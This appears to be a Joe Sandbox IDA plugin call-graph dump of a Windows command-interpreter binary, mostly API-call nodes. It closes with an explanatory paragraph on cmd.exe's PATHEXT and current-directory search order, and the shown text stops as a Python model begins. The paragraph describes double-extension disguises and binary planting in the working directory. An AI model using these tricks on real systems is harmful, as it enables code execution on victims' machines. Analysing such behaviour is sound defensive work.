FileTimeToSystemTime 17399->17401 17459 7ff6a0e98654 17400->17459 17402 7ff6a0e831e0 17401->17402 17403 7ff6a0e8e5ed 17401->17403 17406 7ff6a0e8e5a8 17402->17406 17407 7ff6a0e831ff 17402->17407 17405 7ff6a0e8e5fe 17403->17405 17414 7ff6a0e8e750 17403->17414 17470 7ff6a0e85508 GetUserDefaultLCID 17405->17470 17465 7ff6a0e83448 17406->17465 17409 7ff6a0e833f0 _vsnwprintf 17407->17409 17412 7ff6a0e83247 17409->17412 17417 7ff6a0e88f80 7 API calls 17412->17417 17413 7ff6a0e8e5e8 17416 7ff6a0e833f0 _vsnwprintf 17414->17416 17415 7ff6a0e8e629 17418 7ff6a0e8e711 17415->17418 17424 7ff6a0e8e6e7 memmove 17415->17424 17419 7ff6a0e8e748 17416->17419 17420 7ff6a0e83266 17417->17420 17421 7ff6a0e85508 GetUserDefaultLCID 17418->17421 17419->17413 17419->17419 17472 7ff6a0e834a0 17419->17472 17420->17386 17422 7ff6a0e8e716 GetTimeFormatW 17421->17422 17422->17419 17424->17415 17426 7ff6a0e76f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 17425->17426 17442 7ff6a0e76fbf 17425->17442 17427 7ff6a0e76f90 17426->17427 17436 7ff6a0e942b6 17426->17436 17429 7ff6a0e85508 GetUserDefaultLCID 17427->17429 17428 7ff6a0e98654 9 API calls 17428->17442 17430 7ff6a0e76f97 GetLocaleInfoW 17429->17430 17430->17442 17431 7ff6a0e9433f 17433 7ff6a0e833f0 _vsnwprintf 17431->17433 17432 7ff6a0e94322 realloc 17432->17431 17432->17436 17435 7ff6a0e9437d 17433->17435 17434 7ff6a0e85508 GetUserDefaultLCID 17437 7ff6a0e77042 GetDateFormatW 17434->17437 17450 7ff6a0e943ea 17435->17450 17453 7ff6a0e943fb 17435->17453 17436->17431 17436->17432 17438 7ff6a0e73278 153 API calls 17436->17438 17439 7ff6a0e7707a 17437->17439 17438->17436 17440 7ff6a0e85508 GetUserDefaultLCID 17439->17440 17446 7ff6a0e7708a 17439->17446 17441 7ff6a0e7714a GetDateFormatW 17440->17441 17443 7ff6a0e942a0 GetLastError 17441->17443 17444 7ff6a0e77175 realloc 17441->17444 17442->17428 17442->17434 17442->17442 17445 7ff6a0e9427f memmove 17442->17445 17449 7ff6a0e77020 memmove 17442->17449 17443->17436 
17444->17436 17447 7ff6a0e7719c 17444->17447 17445->17442 17446->17435 17456 7ff6a0e770bd 17446->17456 17448 7ff6a0e85508 GetUserDefaultLCID 17447->17448 17451 7ff6a0e771ae GetDateFormatW 17448->17451 17449->17442 17452 7ff6a0e83448 153 API calls 17450->17452 17451->17442 17451->17443 17455 7ff6a0e943f9 17452->17455 17454 7ff6a0e83448 153 API calls 17453->17454 17454->17455 17456->17455 17456->17456 17457 7ff6a0e88f80 7 API calls 17456->17457 17458 7ff6a0e77129 17457->17458 17458->17386 17460 7ff6a0e98673 GetSystemTime 17459->17460 17461 7ff6a0e98686 17459->17461 17462 7ff6a0e986cc SystemTimeToFileTime 17460->17462 17461->17462 17463 7ff6a0e88f80 7 API calls 17462->17463 17464 7ff6a0e986ed 17463->17464 17464->17406 17495 7ff6a0e8363c 17465->17495 17468 7ff6a0e834a0 166 API calls 17469 7ff6a0e83491 17468->17469 17469->17413 17471 7ff6a0e85529 GetLocaleInfoW 17470->17471 17471->17415 17473 7ff6a0e834bf 17472->17473 17494 7ff6a0e834f5 17472->17494 17499 7ff6a0e83578 _get_osfhandle 17473->17499 17476 7ff6a0e8350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 17479 7ff6a0e8e8d2 GetLastError 17476->17479 17480 7ff6a0e83557 ReleaseSRWLockShared 17476->17480 17477 7ff6a0e834cd 17506 7ff6a0e836ec _get_osfhandle 17477->17506 17482 7ff6a0e8e8e5 GetLastError 17479->17482 17481 7ff6a0e834e1 17480->17481 17481->17482 17481->17494 17513 7ff6a0e801b8 _get_osfhandle GetFileType 17482->17513 17485 7ff6a0e8e918 17518 7ff6a0e9f318 _get_osfhandle GetFileType 17485->17518 17486 7ff6a0e8e908 17487 7ff6a0e73278 160 API calls 17486->17487 17487->17494 17489 7ff6a0e8e91f 17490 7ff6a0e8e931 17489->17490 17491 7ff6a0e8e923 17489->17491 17519 7ff6a0e9f1d8 17490->17519 17492 7ff6a0e73278 160 API calls 17491->17492 17492->17494 17494->17413 17496 7ff6a0e83664 17495->17496 17498 7ff6a0e8347b 17495->17498 17497 7ff6a0e83684 _vsnwprintf 17496->17497 17497->17498 17498->17468 17500 7ff6a0e83599 GetFileType 17499->17500 17501 7ff6a0e834c9 17499->17501 17500->17501 17504 7ff6a0e835b1 17500->17504 
17501->17476 17501->17477 17502 7ff6a0e8e940 17503 7ff6a0e835c3 GetStdHandle 17505 7ff6a0e835d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17503->17505 17504->17502 17504->17503 17504->17505 17505->17501 17507 7ff6a0e8e95c WriteFile 17506->17507 17512 7ff6a0e83731 17506->17512 17508 7ff6a0e8e980 WideCharToMultiByte WriteFile 17507->17508 17511 7ff6a0e837a1 17508->17511 17508->17512 17509 7ff6a0e83747 17510 7ff6a0e8374b WideCharToMultiByte WriteFile 17509->17510 17509->17511 17510->17511 17511->17481 17512->17508 17512->17509 17512->17511 17514 7ff6a0e801eb 17513->17514 17515 7ff6a0e80200 17513->17515 17514->17485 17514->17486 17515->17514 17516 7ff6a0e80221 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17515->17516 17517 7ff6a0e80212 GetStdHandle 17515->17517 17516->17514 17517->17516 17518->17489 17520 7ff6a0e9f1e8 17519->17520 17521 7ff6a0e9f220 17520->17521 17522 7ff6a0e73278 166 API calls 17520->17522 17521->17494 17522->17521 17524 7ff6a0e76ae8 17523->17524 17528 7ff6a0e84a40 GetProcessHeap HeapAlloc 17523->17528 17524->17323 17526 7ff6a0e84a91 memmove 17527 7ff6a0e84a9f FreeEnvironmentStringsW 17526->17527 17527->17524 17528->17526 17528->17527 17530 7ff6a0e7b061 17529->17530 17530->17231 17530->17530 17532 7ff6a0e83578 6 API calls 17531->17532 17533 7ff6a0e732e8 17532->17533 17534 7ff6a0e732f0 _get_osfhandle GetConsoleScreenBufferInfo 17533->17534 17535 7ff6a0e7331d 17533->17535 17534->17535 17567 7ff6a0e73410 17535->17567 17537 7ff6a0e733a8 17540 7ff6a0e733b0 17537->17540 17542 7ff6a0e911ff 17537->17542 17538 7ff6a0e836ec 6 API calls 17543 7ff6a0e7333d 17538->17543 17539 7ff6a0e73368 WriteConsoleW 17539->17543 17544 7ff6a0e911cc GetLastError 17539->17544 17545 7ff6a0e88f80 7 API calls 17540->17545 17541 7ff6a0e91057 GetConsoleScreenBufferInfo 17541->17543 17546 7ff6a0e91079 WriteConsoleW 17541->17546 17583 7ff6a0e84c1c 17542->17583 17543->17537 17543->17538 17543->17539 17543->17541 17543->17544 17548 7ff6a0e911df GetLastError 
17543->17548 17552 7ff6a0e73400 17543->17552 17544->17543 17549 7ff6a0e7326c 17545->17549 17546->17543 17550 7ff6a0e910a8 9 API calls 17546->17550 17548->17537 17549->17089 17550->17543 17553 7ff6a0e91181 17550->17553 17552->17548 17582 7ff6a0e9bde4 EnterCriticalSection LeaveCriticalSection 17553->17582 17568 7ff6a0e7345c FormatMessageW 17567->17568 17569 7ff6a0e912cd _ultoa GetACP 17567->17569 17568->17569 17577 7ff6a0e7348b 17568->17577 17587 7ff6a0e80460 17569->17587 17572 7ff6a0e7349d wcschr 17573 7ff6a0e734b4 17572->17573 17572->17577 17574 7ff6a0e734c4 FormatMessageW 17573->17574 17575 7ff6a0e9121d GetProcessHeap HeapAlloc 17573->17575 17576 7ff6a0e734ef 17574->17576 17575->17576 17581 7ff6a0e9124f FormatMessageW GetProcessHeap RtlFreeHeap 17575->17581 17578 7ff6a0e88f80 7 API calls 17576->17578 17577->17572 17577->17573 17580 7ff6a0e734ff 17578->17580 17580->17543 17581->17569 17584 7ff6a0e84c24 17583->17584 17586 7ff6a0e84c2f exit 17584->17586 17589 7ff6a0e84c50 17584->17589 17588 7ff6a0e80472 MultiByteToWideChar 17587->17588 17595 7ff6a0e84cb0 17589->17595 17592 7ff6a0e84c6c 17592->17584 17593 7ff6a0e83c24 164 API calls 17594 7ff6a0e84c84 GetProcessHeap RtlFreeHeap 17593->17594 17594->17592 17599 7ff6a0e84cfa 17595->17599 17600 7ff6a0e84cda 17595->17600 17596 7ff6a0e88f80 7 API calls 17597 7ff6a0e84c64 17596->17597 17597->17592 17597->17593 17598 7ff6a0e8eefe realloc 17598->17600 17599->17598 17599->17600 17600->17596 20148 7ff6a0e7b3f0 20150 7ff6a0e7b41a 20148->20150 20149 7ff6a0e8c2a3 iswdigit 20149->20150 20151 7ff6a0e8c2b7 20149->20151 20150->20149 20152 7ff6a0e7b42f 20150->20152 20153 7ff6a0e73278 166 API calls 20151->20153 20156 7ff6a0e7be00 20152->20156 20155 7ff6a0e7b461 20153->20155 20157 7ff6a0e7bec8 20156->20157 20158 7ff6a0e7be1b 20156->20158 20157->20155 20158->20157 20159 7ff6a0e7be67 20158->20159 20160 7ff6a0e7be47 memset 20158->20160 20162 7ff6a0e7be73 20159->20162 20163 7ff6a0e7bf29 20159->20163 20166 7ff6a0e7beaf 20159->20166 20262 
7ff6a0e7bff0 20160->20262 20164 7ff6a0e7be92 20162->20164 20167 7ff6a0e7bf0c 20162->20167 20165 7ff6a0e7cd90 166 API calls 20163->20165 20173 7ff6a0e7bea1 20164->20173 20190 7ff6a0e7c620 GetConsoleTitleW 20164->20190 20169 7ff6a0e7bf33 20165->20169 20166->20157 20171 7ff6a0e7bff0 185 API calls 20166->20171 20300 7ff6a0e7b0d8 memset 20167->20300 20169->20166 20174 7ff6a0e7bf70 20169->20174 20177 7ff6a0e788a8 _wcsicmp 20169->20177 20171->20157 20173->20166 20178 7ff6a0e7af98 2 API calls 20173->20178 20184 7ff6a0e7bf75 20174->20184 20413 7ff6a0e771ec 20174->20413 20175 7ff6a0e7bf1e 20175->20166 20180 7ff6a0e7bf5a 20177->20180 20178->20166 20179 7ff6a0e7bfa9 20179->20166 20181 7ff6a0e7cd90 166 API calls 20179->20181 20180->20174 20360 7ff6a0e80a6c 20180->20360 20183 7ff6a0e7bfbb 20181->20183 20183->20166 20186 7ff6a0e8081c 166 API calls 20183->20186 20185 7ff6a0e7b0d8 194 API calls 20184->20185 20187 7ff6a0e7bf7f 20185->20187 20186->20184 20187->20166 20233 7ff6a0e85ad8 20187->20233 20191 7ff6a0e7ca2f 20190->20191 20193 7ff6a0e7c675 20190->20193 20192 7ff6a0e8c5fc GetLastError 20191->20192 20195 7ff6a0e73278 166 API calls 20191->20195 20196 7ff6a0e8855c ??_V@YAXPEAX 20191->20196 20192->20191 20194 7ff6a0e7ca40 17 API calls 20193->20194 20205 7ff6a0e7c69b 20194->20205 20195->20191 20196->20191 20197 7ff6a0e8291c 8 API calls 20203 7ff6a0e7c762 20197->20203 20198 7ff6a0e7c9b5 20202 7ff6a0e8855c ??_V@YAXPEAX 20198->20202 20199 7ff6a0e789c0 23 API calls 20199->20203 20200 7ff6a0e7c978 towupper 20200->20203 20201 7ff6a0e8855c ??_V@YAXPEAX 20201->20203 20204 7ff6a0e7c855 20202->20204 20203->20191 20203->20192 20203->20197 20203->20198 20203->20199 20203->20200 20203->20201 20203->20203 20206 7ff6a0e8c60e 20203->20206 20218 7ff6a0e7c83d 20203->20218 20221 7ff6a0e7c78a wcschr 20203->20221 20223 7ff6a0e7ca25 20203->20223 20225 7ff6a0e8c684 20203->20225 20228 7ff6a0e7ca2a 20203->20228 20230 7ff6a0e7ca16 GetLastError 20203->20230 20208 7ff6a0e7c872 20204->20208 20212 7ff6a0e8c6b8 
SetConsoleTitleW 20204->20212 20205->20191 20205->20198 20205->20203 20207 7ff6a0e7d3f0 223 API calls 20205->20207 20209 7ff6a0e9ec14 173 API calls 20206->20209 20210 7ff6a0e7c741 20207->20210 20211 7ff6a0e8855c ??_V@YAXPEAX 20208->20211 20209->20203 20213 7ff6a0e7c74d 20210->20213 20215 7ff6a0e7c8b5 wcsncmp 20210->20215 20214 7ff6a0e7c87c 20211->20214 20212->20208 20213->20203 20216 7ff6a0e7bd38 207 API calls 20213->20216 20217 7ff6a0e88f80 7 API calls 20214->20217 20215->20203 20215->20213 20216->20203 20219 7ff6a0e7c88e 20217->20219 20419 7ff6a0e7cb40 20218->20419 20219->20173 20221->20203 20226 7ff6a0e73278 166 API calls 20223->20226 20227 7ff6a0e73278 166 API calls 20225->20227 20226->20191 20227->20191 20229 7ff6a0e89158 7 API calls 20228->20229 20229->20191 20232 7ff6a0e73278 166 API calls 20230->20232 20232->20191 20234 7ff6a0e7cd90 166 API calls 20233->20234 20235 7ff6a0e85b12 20234->20235 20236 7ff6a0e85b8b 20235->20236 20237 7ff6a0e7cb40 166 API calls 20235->20237 20239 7ff6a0e88f80 7 API calls 20236->20239 20238 7ff6a0e85b26 20237->20238 20238->20236 20241 7ff6a0e80a6c 273 API calls 20238->20241 20240 7ff6a0e7bf99 20239->20240 20240->20173 20242 7ff6a0e85b43 20241->20242 20243 7ff6a0e85bb8 20242->20243 20244 7ff6a0e85b48 GetConsoleTitleW 20242->20244 20245 7ff6a0e85bbd GetConsoleTitleW 20243->20245 20246 7ff6a0e85bf4 20243->20246 20247 7ff6a0e7cad4 172 API calls 20244->20247 20248 7ff6a0e7cad4 172 API calls 20245->20248 20249 7ff6a0e85bfd 20246->20249 20250 7ff6a0e8f452 20246->20250 20251 7ff6a0e85b66 20247->20251 20252 7ff6a0e85bdb 20248->20252 20249->20236 20256 7ff6a0e85c1b 20249->20256 20257 7ff6a0e8f462 20249->20257 20254 7ff6a0e83c24 166 API calls 20250->20254 20435 7ff6a0e84224 InitializeProcThreadAttributeList 20251->20435 20495 7ff6a0e796e8 20252->20495 20254->20236 20258 7ff6a0e73278 166 API calls 20256->20258 20260 7ff6a0e73278 166 API calls 20257->20260 20258->20236 20259 7ff6a0e85b7f 20261 7ff6a0e85c3c SetConsoleTitleW 20259->20261 
20260->20236 20261->20236 20263 7ff6a0e7c01c 20262->20263 20264 7ff6a0e7c0c4 20262->20264 20265 7ff6a0e7c086 20263->20265 20266 7ff6a0e7c022 20263->20266 20264->20159 20269 7ff6a0e7c144 20265->20269 20282 7ff6a0e7c094 20265->20282 20267 7ff6a0e7c113 20266->20267 20268 7ff6a0e7c030 20266->20268 20278 7ff6a0e7ff70 2 API calls 20267->20278 20283 7ff6a0e7c053 20267->20283 20270 7ff6a0e7c039 wcschr 20268->20270 20268->20283 20274 7ff6a0e7c151 20269->20274 20289 7ff6a0e7c1c8 20269->20289 20271 7ff6a0e7c301 20270->20271 20270->20283 20277 7ff6a0e7cd90 166 API calls 20271->20277 20272 7ff6a0e7c058 20284 7ff6a0e7ff70 2 API calls 20272->20284 20287 7ff6a0e7c073 20272->20287 20273 7ff6a0e7c0c6 20275 7ff6a0e7c0cf wcschr 20273->20275 20273->20287 20770 7ff6a0e7c460 20274->20770 20281 7ff6a0e7c1be 20275->20281 20275->20287 20276 7ff6a0e7c460 183 API calls 20276->20282 20299 7ff6a0e7c30b 20277->20299 20278->20283 20285 7ff6a0e7cd90 166 API calls 20281->20285 20282->20264 20282->20276 20283->20272 20283->20273 20290 7ff6a0e7c211 20283->20290 20284->20287 20285->20289 20286 7ff6a0e7c460 183 API calls 20286->20264 20287->20264 20288 7ff6a0e7c460 183 API calls 20287->20288 20288->20287 20289->20264 20289->20290 20291 7ff6a0e7c285 20289->20291 20295 7ff6a0e7d840 178 API calls 20289->20295 20292 7ff6a0e7ff70 2 API calls 20290->20292 20291->20290 20296 7ff6a0e7b6b0 170 API calls 20291->20296 20292->20264 20293 7ff6a0e7d840 178 API calls 20293->20299 20294 7ff6a0e7b6b0 170 API calls 20294->20283 20295->20289 20297 7ff6a0e7c2ac 20296->20297 20297->20287 20297->20290 20298 7ff6a0e7c3d4 20298->20287 20298->20290 20298->20294 20299->20264 20299->20290 20299->20293 20299->20298 20301 7ff6a0e7ca40 17 API calls 20300->20301 20317 7ff6a0e7b162 20301->20317 20302 7ff6a0e7b2f7 ??_V@YAXPEAX 20303 7ff6a0e7b303 20302->20303 20305 7ff6a0e88f80 7 API calls 20303->20305 20304 7ff6a0e81ea0 8 API calls 20304->20317 20308 7ff6a0e7b315 20305->20308 20306 7ff6a0e7b1d9 20307 7ff6a0e7cd90 166 API calls 
20306->20307 20325 7ff6a0e7b1ed 20306->20325 20307->20325 20308->20164 20308->20175 20310 7ff6a0e7b2e1 20310->20302 20310->20303 20311 7ff6a0e7b228 _get_osfhandle 20313 7ff6a0e7b23f _get_osfhandle 20311->20313 20311->20325 20312 7ff6a0e8bfef _get_osfhandle SetFilePointer 20314 7ff6a0e8c01d 20312->20314 20312->20325 20313->20325 20316 7ff6a0e833f0 _vsnwprintf 20314->20316 20319 7ff6a0e8c038 20316->20319 20317->20304 20317->20306 20317->20310 20317->20317 20318 7ff6a0e801b8 6 API calls 20318->20325 20324 7ff6a0e73278 166 API calls 20319->20324 20320 7ff6a0e8c1c3 20321 7ff6a0e833f0 _vsnwprintf 20320->20321 20321->20319 20322 7ff6a0e7d208 _close 20322->20325 20323 7ff6a0e826e0 19 API calls 20323->20325 20327 7ff6a0e8c1f9 20324->20327 20325->20310 20325->20311 20325->20312 20325->20318 20325->20320 20325->20322 20325->20323 20326 7ff6a0e8c060 20325->20326 20328 7ff6a0e8c246 20325->20328 20329 7ff6a0e8c1a5 20325->20329 20331 7ff6a0e7b038 _dup2 20325->20331 20336 7ff6a0e7b356 20325->20336 20784 7ff6a0e7affc _dup 20325->20784 20786 7ff6a0e9f318 _get_osfhandle GetFileType 20325->20786 20326->20328 20332 7ff6a0e809f4 2 API calls 20326->20332 20330 7ff6a0e7af98 2 API calls 20327->20330 20333 7ff6a0e7af98 2 API calls 20328->20333 20334 7ff6a0e7b038 _dup2 20329->20334 20330->20310 20331->20325 20337 7ff6a0e8c084 20332->20337 20338 7ff6a0e8c24b 20333->20338 20335 7ff6a0e8c1b7 20334->20335 20339 7ff6a0e8c1be 20335->20339 20340 7ff6a0e8c207 20335->20340 20343 7ff6a0e7af98 2 API calls 20336->20343 20341 7ff6a0e7b900 166 API calls 20337->20341 20342 7ff6a0e9f1d8 166 API calls 20338->20342 20344 7ff6a0e7d208 _close 20339->20344 20346 7ff6a0e7d208 _close 20340->20346 20345 7ff6a0e8c08c 20341->20345 20342->20310 20347 7ff6a0e8c211 20343->20347 20344->20320 20348 7ff6a0e8c094 wcsrchr 20345->20348 20358 7ff6a0e8c0ad 20345->20358 20346->20336 20349 7ff6a0e833f0 _vsnwprintf 20347->20349 20348->20358 20350 7ff6a0e8c22c 20349->20350 20351 7ff6a0e73278 166 API calls 20350->20351 20351->20310 
20352 7ff6a0e8c106 20353 7ff6a0e7ff70 2 API calls 20352->20353 20355 7ff6a0e8c13b 20353->20355 20354 7ff6a0e8c0e0 _wcsnicmp 20354->20358 20355->20328 20356 7ff6a0e8c146 SearchPathW 20355->20356 20356->20328 20357 7ff6a0e8c188 20356->20357 20359 7ff6a0e826e0 19 API calls 20357->20359 20358->20352 20358->20354 20359->20329 20361 7ff6a0e81ea0 8 API calls 20360->20361 20362 7ff6a0e80ab9 20361->20362 20363 7ff6a0e80b12 memset 20362->20363 20364 7ff6a0e8d927 20362->20364 20365 7ff6a0e80aee _wcsnicmp 20362->20365 20371 7ff6a0e8128f ??_V@YAXPEAX 20362->20371 20366 7ff6a0e7ca40 17 API calls 20363->20366 20368 7ff6a0e8081c 166 API calls 20364->20368 20365->20363 20365->20364 20367 7ff6a0e80b5a 20366->20367 20370 7ff6a0e7b364 17 API calls 20367->20370 20381 7ff6a0e8d94e 20367->20381 20369 7ff6a0e8d933 20368->20369 20369->20363 20369->20371 20395 7ff6a0e80b6f 20370->20395 20372 7ff6a0e8d96b ??_V@YAXPEAX 20372->20381 20373 7ff6a0e80b8c wcschr 20373->20395 20375 7ff6a0e83bac wcschr 20375->20395 20376 7ff6a0e8d99a wcschr 20376->20381 20377 7ff6a0e80c0f wcsrchr 20377->20381 20377->20395 20378 7ff6a0e8d9ca GetFileAttributesW 20378->20381 20399 7ff6a0e8da64 20378->20399 20379 7ff6a0e8da74 20380 7ff6a0e8da90 GetFileAttributesW 20379->20380 20379->20399 20380->20381 20382 7ff6a0e8daa8 GetLastError 20380->20382 20381->20372 20381->20376 20381->20378 20383 7ff6a0e8d9fd ??_V@YAXPEAX 20381->20383 20381->20399 20384 7ff6a0e8dab9 20382->20384 20382->20399 20383->20381 20384->20381 20385 7ff6a0e7cd90 166 API calls 20385->20395 20386 7ff6a0e83060 171 API calls 20386->20395 20387 7ff6a0e8081c 166 API calls 20387->20395 20388 7ff6a0e7d3f0 223 API calls 20388->20395 20389 7ff6a0e81ea0 8 API calls 20389->20395 20390 7ff6a0e7af74 170 API calls 20390->20395 20391 7ff6a0e80d71 wcsrchr 20392 7ff6a0e80d97 NeedCurrentDirectoryForExePathW 20391->20392 20391->20395 20392->20381 20392->20395 20394 7ff6a0e80fb1 wcsrchr 20394->20395 20396 7ff6a0e80fd0 wcschr 20394->20396 20395->20371 20395->20373 
20395->20375 20395->20377 20395->20379 20395->20381 20395->20385 20395->20386 20395->20387 20395->20388 20395->20389 20395->20390 20395->20391 20395->20394 20395->20396 20397 7ff6a0e82eb4 22 API calls 20395->20397 20401 7ff6a0e810fd wcsrchr 20395->20401 20410 7ff6a0e81087 _wcsicmp 20395->20410 20787 7ff6a0e8291c GetDriveTypeW 20395->20787 20790 7ff6a0e82efc 20395->20790 20398 7ff6a0e80fed wcschr 20396->20398 20396->20399 20397->20395 20398->20395 20398->20399 20401->20395 20402 7ff6a0e8111a _wcsicmp 20401->20402 20403 7ff6a0e8123d 20402->20403 20404 7ff6a0e81138 _wcsicmp 20402->20404 20406 7ff6a0e81175 20403->20406 20407 7ff6a0e81250 ??_V@YAXPEAX 20403->20407 20404->20403 20405 7ff6a0e810c5 20404->20405 20405->20406 20408 7ff6a0e81169 ??_V@YAXPEAX 20405->20408 20409 7ff6a0e88f80 7 API calls 20406->20409 20407->20406 20408->20406 20411 7ff6a0e81189 20409->20411 20410->20379 20412 7ff6a0e810a7 _wcsicmp 20410->20412 20411->20174 20412->20379 20412->20405 20414 7ff6a0e77279 20413->20414 20415 7ff6a0e77211 _setjmp 20413->20415 20414->20179 20415->20414 20417 7ff6a0e77265 20415->20417 20804 7ff6a0e772b0 20417->20804 20420 7ff6a0e7cb63 20419->20420 20421 7ff6a0e7cd90 166 API calls 20420->20421 20422 7ff6a0e7c848 20421->20422 20422->20204 20423 7ff6a0e7cad4 20422->20423 20424 7ff6a0e7cad9 20423->20424 20432 7ff6a0e7cb05 20423->20432 20425 7ff6a0e7cd90 166 API calls 20424->20425 20424->20432 20426 7ff6a0e8c722 20425->20426 20427 7ff6a0e8c72e GetConsoleTitleW 20426->20427 20426->20432 20428 7ff6a0e8c74a 20427->20428 20427->20432 20429 7ff6a0e7b6b0 170 API calls 20428->20429 20434 7ff6a0e8c778 20429->20434 20430 7ff6a0e8c7ec 20431 7ff6a0e7ff70 2 API calls 20430->20431 20431->20432 20432->20204 20433 7ff6a0e8c7dd SetConsoleTitleW 20433->20430 20434->20430 20434->20433 20436 7ff6a0e842ab UpdateProcThreadAttribute 20435->20436 20437 7ff6a0e8ecd4 GetLastError 20435->20437 20438 7ff6a0e8ecf0 GetLastError 20436->20438 20439 7ff6a0e842eb memset memset GetStartupInfoW 20436->20439 
20440 7ff6a0e8ecee 20437->20440 20532 7ff6a0e99eec 20438->20532 20442 7ff6a0e83a90 170 API calls 20439->20442 20444 7ff6a0e843a8 20442->20444 20445 7ff6a0e7b900 166 API calls 20444->20445 20446 7ff6a0e843bb 20445->20446 20447 7ff6a0e843cc 20446->20447 20448 7ff6a0e84638 _local_unwind 20446->20448 20449 7ff6a0e843de wcsrchr 20447->20449 20456 7ff6a0e84415 20447->20456 20448->20447 20450 7ff6a0e843f7 lstrcmpW 20449->20450 20449->20456 20452 7ff6a0e84668 20450->20452 20450->20456 20520 7ff6a0e99044 20452->20520 20453 7ff6a0e8441a 20455 7ff6a0e8442a CreateProcessW 20453->20455 20458 7ff6a0e84596 CreateProcessAsUserW 20453->20458 20457 7ff6a0e8448b 20455->20457 20519 7ff6a0e85a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 20456->20519 20459 7ff6a0e84495 CloseHandle 20457->20459 20460 7ff6a0e84672 GetLastError 20457->20460 20458->20457 20461 7ff6a0e8498c 8 API calls 20459->20461 20474 7ff6a0e8468d 20460->20474 20462 7ff6a0e844c5 20461->20462 20466 7ff6a0e844cd 20462->20466 20462->20474 20463 7ff6a0e847a3 20463->20259 20464 7ff6a0e844f8 20464->20463 20465 7ff6a0e84612 20464->20465 20469 7ff6a0e85cb4 7 API calls 20464->20469 20470 7ff6a0e8461c 20465->20470 20472 7ff6a0e847e1 CloseHandle 20465->20472 20466->20463 20466->20464 20484 7ff6a0e9a250 33 API calls 20466->20484 20467 7ff6a0e7cd90 166 API calls 20468 7ff6a0e84724 20467->20468 20471 7ff6a0e8472c _local_unwind 20468->20471 20479 7ff6a0e8473d 20468->20479 20473 7ff6a0e84517 20469->20473 20475 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20470->20475 20471->20479 20472->20470 20476 7ff6a0e833f0 _vsnwprintf 20473->20476 20474->20466 20474->20467 20477 7ff6a0e847fa DeleteProcThreadAttributeList 20475->20477 20478 7ff6a0e84544 20476->20478 20480 7ff6a0e88f80 7 API calls 20477->20480 20481 7ff6a0e8498c 8 API calls 20478->20481 20485 7ff6a0e7ff70 GetProcessHeap RtlFreeHeap 20479->20485 20482 7ff6a0e84820 20480->20482 20483 7ff6a0e84558 20481->20483 20482->20259 20486 7ff6a0e84564 20483->20486 20487 7ff6a0e847ae 
Call graph (continued; rendered in the original as an interactive node/edge graph, node identifiers omitted here). Windows and CRT APIs referenced by the remaining nodes, in order of first appearance: _local_unwind, _vsnwprintf, memset, ??_V@YAXPEAX (operator delete[]), DeleteProcThreadAttributeList, wcsspn, wcschr, towupper, longjmp, EnterCriticalSection, LeaveCriticalSection, _tell, _close, GetConsoleOutputCP, GetCPInfo, _wcsicmp, RevertToSelf, CloseHandle, VirtualQuery, _get_osfhandle, SetFilePointer, _getch, GetProcessHeap, RtlFreeHeap, VirtualFree, _setjmp, _dup2, wcsrchr, Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage, GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetThreadLocale, _setmode, GetModuleHandleW, GetProcAddress, SetThreadLocale. The startup routine at 7ff6a0e88d80 (Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage) hands over to 7ff6a0e837d8 (GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetThreadLocale, GetConsoleOutputCP, GetCPInfo, _setjmp, _setmode) and to 7ff6a0e804f4 (GetModuleHandleW, GetProcAddress, SetThreadLocale).
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: ".BAT", ".CMD", ".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC", "COMSPEC", "PATH", "PATHEXT", "cmd"
• API String ID: 3305344409-4288247545
• Opcode ID: 166bda4b5940304c979f579b0b8d98b14fe3377e806c59b456309fb1df77ae39
• Instruction ID: 4efeee771ca3bf04461ab87d733f6921306c89df7626f763dbba8c621a623b9f
• Opcode Fuzzy Hash: 166bda4b5940304c979f579b0b8d98b14fe3377e806c59b456309fb1df77ae39
• Instruction Fuzzy Hash: 6D42E131A0F783A6EB648B2198442BA67A1FF89B95F144234DD1ECB7D5DF3CE448A340
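The string table of this function (the default PATHEXT value .COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC together with COMSPEC, PATH and PATHEXT) is the environment cmd.exe consults when it resolves an external command name, and the API ID fragment CurrentDirectoryNeedPath is consistent with NeedCurrentDirectoryForExePathW, the call that decides whether the current directory is searched before PATH. Both are inferences from the strings above, not statements made by the report. The Python below is an added model of that documented search order, not code from the report or from the analysed sample. It shows why only the last extension of a name counts (a constructed report.pdf.bat is a batch file to the resolver, whatever a file viewer displays), why a binary planted in the working directory is found before the one in System32 unless NoDefaultCurrentDirectoryInExePath is set, and that a name typed with an extension still gets the PATHEXT extensions appended. The file list, directory names and PATH value are constructed for the example; the handling of names that contain a path separator is left out.

```python
"""Model of cmd.exe's external-command resolution (added illustration).

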